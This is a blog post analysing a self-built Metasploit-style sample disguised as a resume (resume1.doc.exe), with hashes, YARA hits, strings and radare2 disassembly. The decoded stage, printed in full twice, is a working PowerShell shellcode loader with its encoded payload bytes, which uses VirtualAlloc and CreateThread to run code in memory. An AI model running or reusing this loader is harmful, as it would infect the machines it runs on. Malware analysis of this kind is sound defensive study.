4.16.2018

Party on the malware bus

I've been playing with some ideas recently and it's actually kind of amusing the responses that I can get and identify the sources from. Lets start with one thing I generated with TheFatRat (basically wrapper for building metasploit compatible shells), testing the generation schemes I decided I would build some ways of doing this. Such as adding base64 of exec to one page and unicorn powershell script to another and using all that. Anyway, lets look:

5 minute easy mode analysis:
; Hashes unknown
rahash2 -a all ./resume1.doc.exe
./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a
./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78
./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd
./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1
./resume1.doc.exe: 0x00000000-0x000041ff xor: eb
./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1
./resume1.doc.exe: 0x00000000-0x000041ff parity: 00
./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000
./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01
./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d
./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d
./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386
./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c
./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00
./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f
./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d
./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045
./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732
./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a
./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917
./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4
./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches
find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null
without_urls ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_First_Publisher_Graphics_format_ ./resume1.doc.exe
_UPolyX_v05_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
NETexecutableMicrosoft ./resume1.doc.exe
IsPE32 ./resume1.doc.exe
IsNET_EXE ./resume1.doc.exe
IsConsole ./resume1.doc.exe
Microsoft_Visual_Studio_NET ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_Basic_NET ./resume1.doc.exe
Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe
NET_executable_ ./resume1.doc.exe
NET_executable ./resume1.doc.exe
domain ./resume1.doc.exe
without_attachments ./resume1.doc.exe
without_urls ./resume1.doc.exe
without_images ./resume1.doc.exe
_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe
without_images ./resume1.doc.exe
IP ./resume1.doc.exe
without_attachments ./resume1.doc.exe
contentis_base64 ./resume1.doc.exe

; strings
rabin2 -zz resume1.doc.exe
Metadata Signature: 0x268 0x10001424a5342 12
.NET Version: v4.0.30319
Number of Metadata Streams: 5
DirectoryAddress: 6c Size: f0
Stream name: #~ 4
DirectoryAddress: 15c Size: b8
Stream name: #Strings 12
DirectoryAddress: 214 Size: 3688
Stream name: #US 4
DirectoryAddress: 389c Size: 10
Stream name: #GUID 8
DirectoryAddress: 38ac Size: 38
Stream name: #Blob 8
vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$
vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀  blocks=Basic Latin,CJK Unified Ideographs Extension A
vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text
vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc
vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc
vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r
vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB
vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319
vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A
vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings
vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID
vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob
vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>
vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd
vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system
vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll
vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object
vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System
vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor
vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main
vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell
vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute
vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices
vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib
vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe
vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB
vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA
vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A
vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs
vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7
vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows
vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain
vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll
vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO
vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo
vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation
vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo
vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0
vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments
vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName
vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription
vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion
vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0
vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName
vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell
vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright
vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks
vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename
vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe
vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName
vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note
payload appears to be powershell payload with base64

; not valid length by itself
JAB...AMAB

; collecting base64 strings together
JAB...==

; writing decoded base64 to file
open('resumebase64.decoded','wb').write("""JAB...==""".decode('base64'))

; strings from decoded base64
rabin2 -zz resumebase64.decoded
vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,
vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell
$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file
open('resumehex.bin','wb').write("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','').decode('hex'))

; radare from bin 
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
       :    0x00000007      d97424f4       fnstenv dword [rsp - 0xc]
       :    0x0000000b      5e             pop rsi
       :    0x0000000c      33c9           xor ecx, ecx
       :    0x0000000e      b147           mov cl, 0x47                ; 'G'
       :    0x00000010      315618         xor dword [rsi + 0x18], edx
       :    0x00000013      83c604         add esi, 4
       :    0x00000016      035620         add edx, dword [rsi + 0x20]
       :    0x00000019      8ac1           mov al, cl
       :    0x0000001b      caa0c8         retf -0x3760
       :    0x0000001e      2a33           sub dh, byte [rbx]
       :    0x00000020      30ada3d601ed   xor byte [rbp - 0x12fe295d], ch
       :    0x00000026      d09331dd93f6   rcl byte [rbx - 0x96c22cf], 1
       :    0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
       :    0x00000031      dade           fcmovu st(0), st(6)
       :    0x00000033      05ff51392b     add eax, 0x2b3951ff
       :    0x00000038      00c9           add cl, cl
      ,===< 0x0000003a      792a           jns 0x66
      |:    0x0000003c      82             invalid
      |:    0x0000003d      10ae8cbbdaa3   adc byte [rsi - 0x5c254474], ch
      |:    0x00000043      cdfc           int 0xfc
      |:    0x00000045      07             invalid
      |:    0x00000046      499f           lahf
      |:    0x00000048      55             push rbp
      |:    0x00000049      43fc           cld
      |:    0x0000004b      30d2           xor dl, dl
      |:    0x0000004d      193dbaa88c45   sbb dword [0x458ca90d], edi
      |:    0x00000053      5f             pop rdi
      |`==< 0x00000054      78ae           js 4
      |.--> 0x00000056      64             invalid
      |:    0x00000057      ce             invalid
      |:,=< 0x00000058      f3e9a6f0d081   jmp 0xffffffff81d0f104
      |:|   0x0000005e      ee             out dx, al
      |:|   0x0000005f      ea             invalid
      |:|   0x00000060      35afb9818d     xor eax, 0x8d81b9af
      |:|   0x00000065      5b             pop rbx
      `---> 0x00000066      3840dc         cmp byte [rax - 0x24], al   ; [0x2:1]=186
       :|   0x00000069      a4             movsb byte [rdi], byte ptr [rsi]
       :|   0x0000006a      97             xchg eax, edi
       :|   0x0000006b      ad             lodsd eax, dword [rsi]
       :|   0x0000006c      d156e9         rcl dword [rsi - 0x17], 1
       :|   0x0000006f      ea             invalid
       :|   0x00000070      d5             invalid
       :|   0x00000071      889c022634a7.  mov byte [rdx + rax - 0x2f58cbda], bl
       :|   0x00000078      55             push rbp
       :,=< 0x00000079      e222           loop 0x9d
      :||   0x0000007b      c3             ret
      :||   0x0000007c      fd             std
      :||   0x0000007d      61             invalid
      :||   0x0000007e      94             xchg eax, esp
      :||   0x0000007f      2f             invalid
      :||   0x00000080      fc             cld
      :||   0x00000081      a6             cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544
      :||   0x00000082      43bbf20307e3   mov r11d, 0xe30703f2
      :||   0x00000088      16             invalid                     ; 0xe30703f2
      :||   0x00000089      95             xchg eax, ebp
      :||   0x0000008a      c4             invalid
      :||   0x0000008b      9f             lahf
      :||   0x0000008c      221e           and bl, byte [rsi]
      ,===< 0x0000008e      eb4f           jmp 0xdf
     |:||   0x00000090      a364c84be83f.  movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1
     |:||   0x00000099      91             xchg eax, ecx
     |:||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4ed7]   ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a0      d5             invalid                     ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a1      9b             wait
      |:|   0x000000a2      4604b1         add al, 0xb1
      |:|   0x000000a5      686bb741e7     push -0x18be4895
      |:|   0x000000aa      fc             cld
      |:|   0x000000ab      c4             invalid
      |`==< 0x000000ac      73a8           jae 0x56
      | |   0x000000ae      56             push rsi
      | |   0x000000af      43             invalid
      | .-> 0x000000b0      3f             invalid
     | :|   0x000000b1      217194         and dword [rcx - 0x6c], esi
     | :|   0x000000b4      4018c5         sbb bpl, al
     | :|   0x000000b7      0abfa336027b   or bh, byte [rdi + 0x7b0236a3]
     | :|   0x000000bd      f7663c         mul dword [rsi + 0x3c]
     | :|   0x000000c0      aa             stosb byte [rdi], al
      | `=< 0x000000c1      78ed           js 0xb0
      | |   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      | |   0x000000c8      c3             ret
      | |   0x000000c9      96             xchg eax, esi
      | |   0x000000ca      6a77           push 0x77                   ; 'w'
      | ,=< 0x000000cc      714f           jno 0x11d
     | ||   0x000000ce      97             xchg eax, edi
      |,==< 0x000000cf      7756           ja 0x127
     ||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
    |||||   0x000000d8      a85f           test al, 0x5f               ; '_'
    |||||   0x000000da      31fe           xor esi, edi
    |||||   0x000000dc      408abe2170b5.  mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255
    | |||   0x000000e3      4a1a5ac1       sbb bl, byte [rdx - 0x3f]
      |||   0x000000e7      22b2c348b823   and dh, byte [rdx + 0x23b848c3]
      |||   0x000000ed      0b47c4         or eax, dword [rdi - 0x3c]
      |||   0x000000f0      63             invalid
      |||   0x000000f1      8764382d       xchg dword [rax + rdi + 0x2d], esp
      |||   0x000000f5      60             invalid
      |||   0x000000f6      002a           add byte [rdx], ch
      |||   0x000000f8      d9805f104f9e   fld dword [rax - 0x61b0efa1]
      ,===< 0x000000fe      753f           jne 0x13f

; changed to 32 bit
radare2 -b 32 resumehex.bin
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
      :     0x00000007      d97424f4       fnstenv dword [esp - 0xc]
      :     0x0000000b      5e             pop esi
      :     0x0000000c      33c9           xor ecx, ecx
      :     0x0000000e      b147           mov cl, 0x47                ; 'G'
      :     0x00000010      315618         xor dword [esi + 0x18], edx
      :     0x00000013      83c604         add esi, 4
      :     0x00000016      035620         add edx, dword [esi + 0x20]
      :     0x00000019      8ac1           mov al, cl
      :     0x0000001b      caa0c8         retf -0x3760
      :     0x0000001e      2a33           sub dh, byte [ebx]
      :     0x00000020      30ada3d601ed   xor byte [ebp - 0x12fe295d], ch
      :     0x00000026      d09331dd93f6   rcl byte [ebx - 0x96c22cf], 1
      :     0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
      :     0x00000031      dade           fcmovu st(0), st(6)
      :     0x00000033      05ff51392b     add eax, 0x2b3951ff
      :     0x00000038      00c9           add cl, cl
     ,====< 0x0000003a      792a           jns 0x66
     |:     0x0000003c      82             invalid
     |:     0x0000003d      10ae8cbbdaa3   adc byte [esi - 0x5c254474], ch
     |:     0x00000043      cdfc           int 0xfc
     |:     0x00000045      07             pop es
     |:     0x00000046      49             dec ecx
     |:     0x00000047      9f             lahf
     |:     0x00000048      55             push ebp
     |:     0x00000049      43             inc ebx
     |:     0x0000004a      fc             cld
     |:     0x0000004b      30d2           xor dl, dl
     |:     0x0000004d      193dbaa88c45   sbb dword [0x458ca8ba], edi
     |:     0x00000053      5f             pop edi
     |`===< 0x00000054      78ae           js 4
     |      0x00000056      64ce           into
     | ,==< 0x00000058      f3e9a6f0d081   jmp 0x81d0f104
     | |    0x0000005e      ee             out dx, al
     | |,=< 0x0000005f      ea35afb9818d.  ljmp 0x5b8d:0x81b9af35
     `----> 0x00000066      3840dc         cmp byte [eax - 0x24], al   ; [0x2:1]=186
      |:|   0x00000069      a4             movsb byte es:[edi], byte ptr [esi]
      |:|   0x0000006a      97             xchg eax, edi
      |:|   0x0000006b      ad             lodsd eax, dword [esi]
      |:|   0x0000006c      d156e9         rcl dword [esi - 0x17], 1
       ,==< 0x0000006f      ead5889c0226.  ljmp 0x3426:0x29c88d5
     ||:|   0x00000076      a7             cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836
     ||:|   0x00000077      d055e2         rcl byte [ebp - 0x1e], 1
     ||:|   0x0000007a      22c3           and al, bl
     ||:|   0x0000007c      fd             std
     ||:|   0x0000007d      61             popal
     ||:|   0x0000007e      94             xchg eax, esp
     ||:|   0x0000007f      2f             das
     ||:|   0x00000080      fc             cld
     ||:|   0x00000081      a6             cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836
     ||:|   0x00000082      43             inc ebx
     ||:|   0x00000083      bbf20307e3     mov ebx, 0xe30703f2
     ||:|   0x00000088      16             push ss
     ||:|   0x00000089      95             xchg eax, ebp
     ||:|   0x0000008a      c49f221eeb4f   les ebx, [edi + 0x4feb1e22]
     ||:|   0x00000090      a364c84be8     mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1
     ||:|   0x00000095      3f             aas
      ||`=< 0x00000096      71cd           jno 0x65
      |||   0x00000098      54             push esp
      |||   0x00000099      91             xchg eax, ecx
      |||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4e37]   ; [0x452b4e37:2]=0xffff
      |||   0x000000a0      d59b           aad 0x9b
      |||   0x000000a2      46             inc esi
      |||   0x000000a3      04b1           add al, 0xb1
      |||   0x000000a5      686bb741e7     push 0xe741b76b
      |||   0x000000aa      fc             cld
      |||   0x000000ab      c473a8         les esi, [ebx - 0x58]
      |||   0x000000ae      56             push esi
      |||   0x000000af      43             inc ebx
      ||.-> 0x000000b0      3f             aas
     ||:|   0x000000b1      217194         and dword [ecx - 0x6c], esi
     ||:|   0x000000b4      40             inc eax
     ||:|   0x000000b5      18c5           sbb ch, al
     ||:|   0x000000b7      0abfa336027b   or bh, byte [edi + 0x7b0236a3]
     ||:|   0x000000bd      f7663c         mul dword [esi + 0x3c]
     ||:|   0x000000c0      aa             stosb byte es:[edi], al
      ||`=< 0x000000c1      78ed           js 0xb0
      |||   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      |||   0x000000c8      c3             ret
      |||   0x000000c9      96             xchg eax, esi
      |||   0x000000ca      6a77           push 0x77                   ; 'w' ; 119
